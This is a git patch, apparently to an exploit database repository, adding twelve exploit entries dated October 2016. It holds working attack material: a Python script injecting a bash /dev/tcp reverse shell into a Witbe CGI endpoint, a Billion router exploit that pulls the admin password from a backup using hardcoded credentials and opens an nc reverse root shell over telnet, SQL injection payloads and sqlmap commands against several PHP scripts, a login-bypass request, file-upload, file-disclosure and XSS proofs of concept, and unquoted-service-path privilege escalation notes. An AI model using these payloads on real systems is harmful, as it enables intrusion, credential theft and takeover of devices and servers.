From cd9e638108f1b3ebfec3e6437c8c5474fadf8f30 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 7 Oct 2016 05:01:18 +0000 Subject: [PATCH] DB: 2016-10-07 12 new exploits phpBB 2.0.10 - Remote Command Execution (CGI) Advance MLM Script - SQL Injection Picosafe Web Gui - Multiple Vulnerabilities Witbe - Remote Code Execution PHP Classifieds Rental Script - Blind SQL Injection B2B Portal Script - Blind SQL Injection MLM Unilevel Plan Script v1.0.2 - SQL Injection Just Dial Clone Script - SQL Injection Comodo Dragon Browser - Unquoted Service Path Privilege Escalation Billion Router 7700NR4 - Remote Command Execution Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation Exagate WEBPack Management System - Multiple Vulnerabilities --- files.csv | 13 ++- platforms/cgi/webapps/40462.py | 39 +++++++++ platforms/hardware/remote/40472.py | 69 +++++++++++++++ platforms/hardware/remote/40474.txt | 100 ++++++++++++++++++++++ platforms/php/webapps/40454.txt | 65 ++++++++++++++ platforms/php/webapps/40466.txt | 60 +++++++++++++ platforms/php/webapps/40467.txt | 61 +++++++++++++ platforms/php/webapps/40468.txt | 61 +++++++++++++ platforms/php/webapps/40469.txt | 44 ++++++++++ platforms/php/webapps/40470.txt | 40 +++++++++ platforms/php/webapps/{673.cgi => 673.pl} | 0 platforms/windows/local/40471.txt | 53 ++++++++++++ platforms/windows/local/40473.txt | 53 ++++++++++++ 13 files changed, 657 insertions(+), 1 deletion(-) create mode 100755 platforms/cgi/webapps/40462.py create mode 100755 platforms/hardware/remote/40472.py create mode 100755 platforms/hardware/remote/40474.txt create mode 100755 platforms/php/webapps/40454.txt create mode 100755 platforms/php/webapps/40466.txt create mode 100755 platforms/php/webapps/40467.txt create mode 100755 platforms/php/webapps/40468.txt create mode 100755 platforms/php/webapps/40469.txt create mode 100755 platforms/php/webapps/40470.txt rename platforms/php/webapps/{673.cgi => 673.pl} (100%) create mode 100755 platforms/windows/local/40471.txt create mode 100755 platforms/windows/local/40473.txt diff --git a/files.csv b/files.csv index c24279e4f..d0707003b 100755 --- a/files.csv +++ b/files.csv @@ -520,7 +520,7 @@ id,file,description,date,author,platform,type,port 670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143 671,platforms/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0 672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0 -673,platforms/php/webapps/673.cgi,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0 +673,platforms/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0 675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0 676,platforms/php/webapps/676.c,"phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0 677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0 @@ -3881,6 +3881,7 @@ id,file,description,date,author,platform,type,port 4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0 4227,platforms/windows/dos/4227.php,"PHP - PHP_gd2.dll imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0 4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow",2007-07-26,ZhenHan.Liu,windows,remote,143 +40466,platforms/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0 4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0 4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0 @@ -36575,6 +36576,7 @@ id,file,description,date,author,platform,type,port 40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0 40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0 40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80 +40454,platforms/php/webapps/40454.txt,"Picosafe Web Gui - Multiple Vulnerabilities",2016-10-05,"Shahab Shamsi",php,webapps,0 40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 @@ -36582,3 +36584,12 @@ id,file,description,date,author,platform,type,port 40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 40460,platforms/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0 40461,platforms/windows/local/40461.txt,"Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0 +40462,platforms/cgi/webapps/40462.py,"Witbe - Remote Code Execution",2016-10-05,BeLmar,cgi,webapps,0 +40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0 +40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0 +40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script v1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0 +40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0 +40471,platforms/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0 +40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0 +40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0 +40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0 diff --git a/platforms/cgi/webapps/40462.py b/platforms/cgi/webapps/40462.py new file mode 100755 index 000000000..494398a6e --- /dev/null +++ b/platforms/cgi/webapps/40462.py @@ -0,0 +1,39 @@ +#!/usr/bin/python +# Exploit Title: Witbe RCE (Remote Code Execution) +# Exploit Author: BeLmar +# Date: 05/10/2016 +# DEMO : https://youtu.be/ooUFXfUfIs0 +# Contact : hb.mz093@gmail.com +# Vendor Homepage: http://www.witbe.net +# Tested on: Windows7/10 & BackBox +# Category: Remote Exploits + +import urllib +import urllib2 +import os + +print " M MW M M XXMMrX, 2Mr72S MW7XS" +print " MM MM M2 M SM MM MM M " +print " M M ZM M M XM MMir0M MMrXS" +print " MM M M M: M SM MM ZM M2 " +print " MMa MMM M ZM MM XM M " +print " XM M M iM 8MZ8W8 MM8BB" +print " EXPLOIT BY BELMAR " +print "" + +print "Run NetCat Listner" # First Run Netcat Listner + +rhost = raw_input('RHOST: ') +lhost = raw_input('LHOST: ') +lport = raw_input('LPORT: ') + +url = 'http://'+rhost+'/cgi-bin/applyConfig.pl' +user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36' +values = {'auth_login': '', #Leave it as it is + 'auth_pwd': '', #Leave it as it is + 'file': 'set|bash -i >& /dev/tcp/'+lhost+'/'+lport+' 0>&1' } + +data = urllib.urlencode(values) +req = urllib2.Request(url, data) +response = urllib2.urlopen(req) +the_page = response.read() \ No newline at end of file diff --git a/platforms/hardware/remote/40472.py b/platforms/hardware/remote/40472.py new file mode 100755 index 000000000..7105d9cd0 --- /dev/null +++ b/platforms/hardware/remote/40472.py @@ -0,0 +1,69 @@ +# Title : Billion Router 7700NR4 Remote Root Command Execution +# Date : 06/10/2016 +# Author : R-73eN +# Tested on: Billion Router 7700NR4 +# Vendor : http://www.billion.com/ +# Vulnerability Description: +# This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users. +# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these +# credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password. +# Using that password we can login to telnet server and use a shell escape to get a reverse root connection. +# You must change host with the target and reverse_ip with your attacking ip. +# Fix: +# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables. +# + +import requests +import base64 +import socket +import time + +host = "" +def_user = "user" +def_pass = "user" +reverse_ip = "" +#Banner +banner = "" +banner +=" ___ __ ____ _ _ \n" +banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" +banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" +banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" +banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" +print banner + + +# limited shell escape +evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip + ' 1337 0backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &' + +def execute_payload(password): + print "[+] Please run nc -lvp 1337 and then press any key [+]" + raw_input() + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host,23)) + s.recv(1024) + s.send("admin\r") + a= s.recv(1024) + time.sleep(1) + s.send(password +"\r") + time.sleep(1) + s.recv(1024) + s.send(evil + "\r") + time.sleep(1) + print "[+] If everything worked you should get a reverse shell [+]" + print "[+] Warning pressing any key will close the SHELL [+]" + raw_input() + + + + +r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass)) +if(r.status_code == 200): + print "[+] Seems the exploit worked [+]" + print "[+] Dumping data . . . [+]" + temp = r.text + admin_pass = temp.split("")[1].split("")[0] +# print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]" + execute_payload(str(base64.b64decode(admin_pass))) +else: + print "[-] Exploit Failed [-]" +print "\n[+] https://www.infogen.al/ [+]\n\n" diff --git a/platforms/hardware/remote/40474.txt b/platforms/hardware/remote/40474.txt new file mode 100755 index 000000000..41c792f25 --- /dev/null +++ b/platforms/hardware/remote/40474.txt @@ -0,0 +1,100 @@ +Document Title: +================ +Exagate WEBpack Management System Multiple Vulnerabilities + +Author: +======== +Halil Dalabasmaz + +Release Date: +============== +07 OCT 2016 + +Product & Service Introduction: +================================ +WEBPack is the individual built-in user-friendly and skilled web +interface allowing web-based access to the main units of the SYSGuard +and POWERGuard series. The advanced software enables the users to +design their customized dashboard smoothly for a detailed monitoring +and management of all the power outlet sockets & sensor and volt free +contact ports, as well as relay outputs. User definition and authorization, +remote access and update, detailed reporting and archiving are among the +many features. + +Vendor Homepage: +================= +http://www.exagate.com/ + +Vulnerability Information: +=========================== +Exagate company uses WEBPack Management System software on the hardware. +The software is web-based and it is provide control on the hardware. There are +multiple vulnerabilities on that software. + +Vulnerability #1: SQL Injection +================================ + +There is no any filtering or validation mechanisim on "login.php". "username" +and "password" inputs are vulnerable to SQL Injection attacks. Sample POST +request is given below. + +POST /login.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 37 + +username=root&password=' or 1=1-- + +Vulnerability #2: Unauthorized Access To Sensetive Information +=============================================================== + +The software is capable of sending e-mail to system admins. But there is no +any authorization mechanism to access e-mail logs. The e-mail logs can accessable +anonymously from "http:///emaillog.txt". + +Vulnerability #3: Unremoved Configuration Files +================================================ + +The software contains the PHP Info file on the following URL. + +http:///api/phpinfo.php + +Vulnerability Disclosure Timeline: +================================== +03 OCT 2016 - Attempted to contact vendor after discovery of vulnerabilities +06 OCT 2016 - No response from vendor and re-attempted to contact vendor +07 OCT 2016 - No response from vendor +07 OCT 2016 - Public Disclosure + +Discovery Status: +================== +Published + +Affected Product(s): +===================== +Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities) + +Tested On: +=========== +Exagate SYSGuard 3001 + +Disclaimer & Information: +========================== +The information provided in this advisory is provided as it is without +any warranty. BGA disclaims all warranties, either expressed or implied, +including the warranties of merchantability and capability for a particular +purpose. BGA or its suppliers are not liable in any case of damage, including +direct, indirect, incidental, consequential loss of business profits or +special damages. + +Domain: www.bgasecurity.com +Social: twitter.com/bgasecurity +Contact: advisory@bga.com.tr + +Copyright © 2016 | BGA Security LLC \ No newline at end of file diff --git a/platforms/php/webapps/40454.txt b/platforms/php/webapps/40454.txt new file mode 100755 index 000000000..0df104b31 --- /dev/null +++ b/platforms/php/webapps/40454.txt @@ -0,0 +1,65 @@ +[-] Title : Picosafe Web Gui - Multiple Vulnerabilities +[-] Author : Shahab Shamsi +[-] Vendor : https://github.com/embeddedprojects/picosafe_webgui +[-] Category : Webapps +[-] Date : 01.October.2016 + + + +Vulnerable page : +picosafe_webgui/webinterface/js/filemanager/filemanager.php + + + + +========================== +| Remote File Upload : +========================== +Vulnerable Source (RFU) : +52: chmod($to, 0755); +48: $to = realpath($curdir) . '/' . $name; +40: function uploadfile($curdir) +46: $name = $_FILES['files']['name'][0]; + +Exploit : +"@$uploadfile")); +curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); +$result = curl_exec($ch); +curl_close($ch); +print "$result"; +?> + +Location : +http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/FileName + + +========================== +| Local File Disclosure : +========================== + +Vulnerable Source (LFD) : +17: $file = base64_decode($_GET['file']); +18: DownloadFile($file); +111: readfile($file); + +POC : +http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?file=base64code-Filename + + +========================== +| Cross-Site Scripting : +========================== + +Vulnerable Source (XSS) : +8: echo json_encode($data); +7: $data = sortfiles($data); +6: $data = listdirectory($directory); +5: $directory = base64_decode($_GET['directory']); + +POC : +http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?directory=Base64-ScriptingCode \ No newline at end of file diff --git a/platforms/php/webapps/40466.txt b/platforms/php/webapps/40466.txt new file mode 100755 index 000000000..8a8a0b806 --- /dev/null +++ b/platforms/php/webapps/40466.txt @@ -0,0 +1,60 @@ +[x]========================================================================================================================================[x] + | Title : Advance MLM Script SQL Vulnerabilities + | Software : Advance MLM Script + | Vendor : http://www.i-netsolution.com/ + | Demo : http://www.i-netsolution.com/item/advance-mlm-script/live_demo/236431 + | Google Dork : news_detail.php?newid= © MLM SCRIPT + | Date : 06 October 2016 + | Author : OoN_Boy +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Technology : PHP + | Database : MySQL + | Price : $ 199 + | Description : MLM business upward day by day, Open Source MLM Script plays an important role for successful multilevel marketing business. + Our advanced featured PHP MLM Script enables MLM companies to manage and run their express selling business more effectively towards a successful way. +[x]========================================================================================================================================[x] + + +[x]========================================================================================================================================[x] + | Exploit : http://localhost/mlm/news_detail.php?newid=%Inject_Here%26 + | Aadmin Page : http://localhost/[path]/admin/index.php +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Proof of concept : sqlmap -u "http://localhost/mlm/news_detail.php?newid=26" --invalid-string +[x]========================================================================================================================================[x] + + --- +Parameter: newid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: newid=26' AND 4440=4440 AND 'AJmz'='AJmz + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 OR time-based blind + Payload: newid=26' OR SLEEP(5) AND 'FokP'='FokP + + Type: UNION query + Title: Generic UNION query (NULL) - 6 columns + Payload: newid=jMCtRq' UNION ALL SELECT NULL,CONCAT(0x71787a7a71,0x48755652787877617966627661486164744748424b6155564f514370537747504c6e736876665150,0x7178787171),NULL,NULL,NULL,NULL-- Afye +--- + +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Greetz : antisecurity.org batamhacker.or.id + | Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va + | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere +[x]========================================================================================================================================[x] + +[x]========================================================================================================================================[x] +| Hi All long time no see ^_^ +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/php/webapps/40467.txt b/platforms/php/webapps/40467.txt new file mode 100755 index 000000000..182840b01 --- /dev/null +++ b/platforms/php/webapps/40467.txt @@ -0,0 +1,61 @@ +[x]========================================================================================================================================[x] + | Title : PHP Classifieds Rental Script Blind SQL Vulnerabilities + | Software : PHP Classifieds Rental Script + | Vendor : http://www.i-netsolution.com/ + | Demo : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993 + | Date : 06 October 2016 + | Author : OoN_Boy +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Technology : PHP + | Database : MySQL + | Price : $ 99 + | Description : PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed + so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being + an easy-to- use software, this Property Rental Script +[x]========================================================================================================================================[x] + + +[x]========================================================================================================================================[x] + | Exploit : http://localhost/product_details.php?refid=%Inject_Here%1319258872 + | Aadmin Page : http://localhost/[path]/admin/index.php +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Proof of concept : sqlmap -u "http://localhost/product_details.php?refid=1319258872" --invalid-string +[x]========================================================================================================================================[x] + + --- +Parameter: refid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: refid=1319258872' AND 3912=3912 AND 'HTMi'='HTMi + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 OR time-based blind + Payload: refid=1319258872' OR SLEEP(5) AND 'QwXZ'='QwXZ + + Type: UNION query + Title: MySQL UNION query (NULL) - 26 columns + Payload: refid=xCUcyB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x644e6e5046537647684864705a527667796f454c666c4656644a73506d4e627a48574969424a4756,0x7176786271),NULL,NULL,NULL,NULL,NULL# +--- + + +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Greetz : antisecurity.org batamhacker.or.id + | Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va + | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere +[x]========================================================================================================================================[x] + +[x]========================================================================================================================================[x] +| Hi All long time no see ^_^ +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/php/webapps/40468.txt b/platforms/php/webapps/40468.txt new file mode 100755 index 000000000..95084f4dc --- /dev/null +++ b/platforms/php/webapps/40468.txt @@ -0,0 +1,61 @@ +[x]========================================================================================================================================[x] + | Title : B2B Portal Script Blind SQL Vulnerabilities + | Software : B2B Portal Script + | Vendor : http://www.i-netsolution.com/ + | Demo : http://www.i-netsolution.com/item/b2b-portal-script/live_demo/190275 + | Date : 06 October 2016 + | Author : OoN_Boy +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Technology : PHP + | Database : MySQL + | Price : $ 249 + | Description : Have an idea about starting your own Alibaba clone website and thinking how to implement it? Our B2B Portal Script + is the platform to transform your idea into the practical world. It is developed in PHP and MySQL and can help global + portals to manage their online transactions with efficiency +[x]========================================================================================================================================[x] + + +[x]========================================================================================================================================[x] + | Exploit : http://localhost/advancedb2b/view-product.php?pid=294' + | Aadmin Page : http://localhost/[path]/admin/index.php +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Proof of concept : sqlmap -u "http://localhost/advancedb2b/view-product.php?pid=294" +[x]========================================================================================================================================[x] + +--- +Parameter: pid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: pid=294' AND 1754=1754 AND 'whqn'='whqn + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: pid=294' AND SLEEP(5) AND 'nGqC'='nGqC + + Type: UNION query + Title: Generic UNION query (NULL) - 33 columns + Payload: pid=294' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766b71,0x656f5962547177636a47435158754754736267535a4d515a4d4c454e535052496652505243795849,0x7176626271),NULL,NULL-- lwGp +--- + + +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Greetz : antisecurity.org batamhacker.or.id + | Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va + | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere +[x]========================================================================================================================================[x] + +[x]========================================================================================================================================[x] +| Hi All long time no see ^_^ +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/php/webapps/40469.txt b/platforms/php/webapps/40469.txt new file mode 100755 index 000000000..d1010c128 --- /dev/null +++ b/platforms/php/webapps/40469.txt @@ -0,0 +1,44 @@ +###################### +# Application Name : MLM Unilevel Plan Script v1.0.2 + +# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL + +# Author Contact : https://twitter.com/byn4tural + +# Vendor Homepage : http://www.i-netsolution.com/ + +# Vulnerable Type : SQL Injection + +# Date : 2016-10-06 + +# Tested on : Windows 10 / Mozilla Firefox +# Linux / Mozilla Firefox +# Linux / sqlmap 1.0.6.28#dev + +###################### SQL Injection Vulnerability ###################### + +# Location : +http://localhost/[path]/news_detail.php + +###################### + +# PoC Exploit: + +http://localhost/[path]/news_detail.php?newid=11%27%20%2F*%2130000and%20ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C115%20and*%2F%20%27x%27%3D%27x + +# Exploit Code via sqlmap: + +sqlmap -u http://localhost/[path]/news_detail.php?newid=11 --dbs + +--- +Parameter: newid (GET) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: newid=11' AND SLEEP(5) AND 'HheB'='HheB +--- +[18:47:12] [INFO] the back-end DBMS is MySQL +web application technology: Nginx +back-end DBMS: MySQL >= 5.0.12 + +###################### + diff --git a/platforms/php/webapps/40470.txt b/platforms/php/webapps/40470.txt new file mode 100755 index 000000000..2be0fe9a0 --- /dev/null +++ b/platforms/php/webapps/40470.txt @@ -0,0 +1,40 @@ +[x]========================================================================================================================================[x] + | Title : Just Dial Clone Script SQL & XSS Vulnerabilities + | Software : Just Dial Clone + | Vendor : http://www.i-netsolution.com/ + | Demo : http://www.i-netsolution.com/item/just-dial-clone/live_demo/423618 + | Date : 06 October 2016 + | Author : OoN_Boy +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Technology : PHP + | Database : MySQL + | Price : $ 299 + | Description : If you wish to launch your own business directory website, we have a readymade solution for you which supports unlimited + categories, uses and secure code. Our Company Catalogue Listing Script is just the right script for you +[x]========================================================================================================================================[x] + + +[x]========================================================================================================================================[x] + | Exploit : http://localhost/jus/restaurants-details.php?fid=%Inject_Here%21 + | Admin Page : http://localhost/[path]/admin/index.php +[x]========================================================================================================================================[x] + + + +[x]========================================================================================================================================[x] + | Proof of concept SQL : http://localhost/jus/restaurants-details.php?fid=%Inject_Here%21 +[x]========================================================================================================================================[x] + +[x]========================================================================================================================================[x] + | Greetz : antisecurity.org batamhacker.or.id + | Vrs-hCk NoGe Jack zxvf Angela h4ntu reel dono Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va + | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere +[x]========================================================================================================================================[x] + +[x]========================================================================================================================================[x] +| Hi All long time no see ^_^ +[x]========================================================================================================================================[x] \ No newline at end of file diff --git a/platforms/php/webapps/673.cgi b/platforms/php/webapps/673.pl similarity index 100% rename from platforms/php/webapps/673.cgi rename to platforms/php/webapps/673.pl diff --git a/platforms/windows/local/40471.txt b/platforms/windows/local/40471.txt new file mode 100755 index 000000000..0b1b8acfd --- /dev/null +++ b/platforms/windows/local/40471.txt @@ -0,0 +1,53 @@ +# Exploit Title: Comodo Dragon Browser Unquoted Service Path Privilege Escalation +# Date: 24/09/2016 +# Author: Yunus YILDIRIM (@Th3GundY) +# Team: CT-Zer0 (@CRYPTTECH) +# Website: http://yildirimyunus.com +# Contact: yunusyildirim@protonmail.com +# Category: local +# Vendor Homepage: https://www.comodo.com +# Software Link: https://www.comodo.com/home/browsers-toolbars/browser.php +# Version: Software Version <= 52.15.25.663 +# Tested on: Windows 7 x86/x64 + +1. Description + +Comodo Dragon Browser Update Service (DragonUpdater) installs as a service with +an unquoted service path running with SYSTEM privileges. +This could potentially allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. + + +2. Proof of Concept + +C:\>sc qc DragonUpdater +[SC] QueryServiceConfig SUCCESS +SERVICE_NAME: DragonUpdater + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : COMODO Dragon Update Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +3. Exploit: + +A successful attempt would require the local attacker must insert an executable file +in the path of the service. +Upon service restart or system reboot, the malicious code will be run with elevated privileges. + + +Additional notes : + +Fixed in version 52.15.25.664 +https://forums.comodo.com/news-announcements-feedback-cd/comodo-dragon-v521525664-is-now-available-for-download-t116786.0.html + +Vulnerability Disclosure Timeline: +========================= +24/09/2016 - Contact With Vendor +26/09/2016 - Vendor Response +03/10/2016 - Release Fixed Version diff --git a/platforms/windows/local/40473.txt b/platforms/windows/local/40473.txt new file mode 100755 index 000000000..5e362d619 --- /dev/null +++ b/platforms/windows/local/40473.txt @@ -0,0 +1,53 @@ +# Exploit Title: Comodo Chromodo Browser Unquoted Service Path Privilege Escalation +# Date: 03/10/2016 +# Author: Yunus YILDIRIM (@Th3GundY) +# Team: CT-Zer0 (@CRYPTTECH) +# Website: http://yildirimyunus.com +# Contact: yunusyildirim@protonmail.com +# Category: local +# Vendor Homepage: https://www.comodo.com +# Software Link: https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php +# Version: Software Version <= 52.15.25.664 +# Tested on: Windows 7 x86/x64 + +1. Description + +Comodo Chromodo Browser Update Service (ChromodoUpdater) installs as a service with +an unquoted service path running with SYSTEM privileges. +This could potentially allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. + + +2. Proof of Concept + +C:\>sc qc ChromodoUpdater +[SC] QueryServiceConfig SUCCESS +SERVICE_NAME: ChromodoUpdater + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Comodo\Chromodo\chromodo_updater.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : COMODO Chromodo Update Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +3. Exploit: + +A successful attempt would require the local attacker must insert an executable file +in the path of the service. +Upon service restart or system reboot, the malicious code will be run with elevated privileges. + + +Additional notes : + +Fixed in version 52.15.25.665 +https://forums.comodo.com/news-announcements-feedback-cd/chromodo-v521525665-is-now-available-for-download-t116787.0.html + +Vulnerability Disclosure Timeline: +========================= +03/10/2016 - Contact With Vendor +03/10/2016 - Vendor Response +05/10/2016 - Release Fixed Version